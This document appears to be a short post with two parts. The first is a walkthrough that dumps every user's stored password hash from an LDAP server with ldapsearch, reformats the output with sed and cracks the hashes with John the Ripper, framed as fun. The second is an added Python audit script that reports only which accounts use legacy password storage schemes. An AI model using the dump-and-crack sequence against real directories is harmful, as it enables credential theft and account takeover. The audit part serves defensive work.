ldapsearch -x -D "cn=bindAcct,dc=domain" -w bindpass -h 6.6.6.6 -b ou=users,dc=domain -LLL "(objectClass=shadowAccount)" userPassword > dearjohn  # query: simple bind, dump userPassword for every shadowAccount
sed -i '/^$/d' dearjohn  # remove blank lines
sed -i 's/,ou=users,dc=domain//g' dearjohn  # strip the domain from the user dn
sed -i 's/dn:\ uid=//g' dearjohn  # remove the "dn: uid=" prefix, leaving the bare uid
sed -i ':a;N;$!ba;s/\n/blast/g' dearjohn  # have fun with line breaks: join every line, using "blast" as a placeholder
sed -i 's/userPassword//g' dearjohn  # strip out the attribute name
sed -i 's/blast::\ /:/g' dearjohn  # format fun: join each uid to its value as uid:value
sed -i 's/blast/\n/g' dearjohn  # bring the remaining line breaks back
john dearjohn
Warning: only loading hashes of type "des", but also saw type "md5"
Use the "--format=md5" option to force loading hashes of that type instead
Loaded 26 password hashes with 26 different salts (Traditional DES [128/128 BS SSE2-16])
Remaining 25 password hashes with 25 different salts
...
...
...
And now you know how to connect to an LDAP server and snarf all the user passwords, get them formatted for
John the Ripper using sed, and then go about cracking them. The fun.
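The same export tells a defender which accounts still store passwords under the legacy schemes John reports above (DES and MD5 crypt). The following is an added example, not part of the original post: the function names, the LEGACY policy list and the sample entries are assumptions constructed for illustration, and it returns scheme names only, never hash values.

```python
import base64
import re

LEGACY = {"des-crypt", "md5-crypt", "MD5", "SHA", "cleartext"}  # assumed policy list
CRYPT_IDS = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt", "2b": "bcrypt"}

def classify(value: str) -> str:
    """Name the storage scheme of one decoded userPassword value."""
    m = re.match(r"\{([A-Za-z0-9-]+)\}(.*)", value, re.S)
    if not m:
        return "cleartext"              # no {SCHEME} prefix at all
    scheme, rest = m.group(1).upper(), m.group(2)
    if scheme != "CRYPT":
        return scheme                   # e.g. SSHA, SHA, MD5
    if m := re.match(r"\$([0-9a-z]+)\$", rest):
        return CRYPT_IDS.get(m.group(1), "crypt-unknown")
    if re.fullmatch(r"[./0-9A-Za-z]{13}", rest):
        return "des-crypt"              # traditional 13-character crypt(3)
    return "crypt-unknown"

def audit(ldif: str) -> dict:
    """Map each dn in `ldapsearch -LLL` output to its userPassword scheme."""
    # LDIF wraps long values onto continuation lines that start with one space.
    ldif = ldif.replace("\r\n", "\n").replace("\n ", "")
    result, dn = {}, None
    for m in re.finditer(r"^(dn|userPassword):(:?) *(.*)$", ldif, re.M):
        attr, b64, val = m.groups()
        if b64:                         # "::" marks a base64-encoded value
            val = base64.b64decode(val).decode("utf-8", "replace")
        if attr == "dn":
            dn = val
        elif dn:
            result[dn] = classify(val)
    return result

def _entry(uid: str, stored: str) -> str:
    """Build one constructed LDIF entry, folded with continuation lines."""
    line = "userPassword:: " + base64.b64encode(stored.encode()).decode()
    folded = line[:76] + "".join("\n " + line[i:i + 75] for i in range(76, len(line), 75))
    return f"dn: uid={uid},ou=users,dc=domain\n{folded}\n\n"

# Constructed sample: placeholder strings shaped like each scheme, not real hashes.
SAMPLE = (_entry("alice", "{crypt}abCDEFGHIJKLM")
          + _entry("bob", "{crypt}$1$saltsalt$" + "x" * 22)
          + _entry("carol", "{crypt}$6$saltsalt$" + "x" * 86)
          + _entry("dave", "{SSHA}" + "x" * 40))

if __name__ == "__main__":
    for dn, scheme in audit(SAMPLE).items():
        print("LEGACY" if scheme in LEGACY else "ok    ", scheme, dn)
```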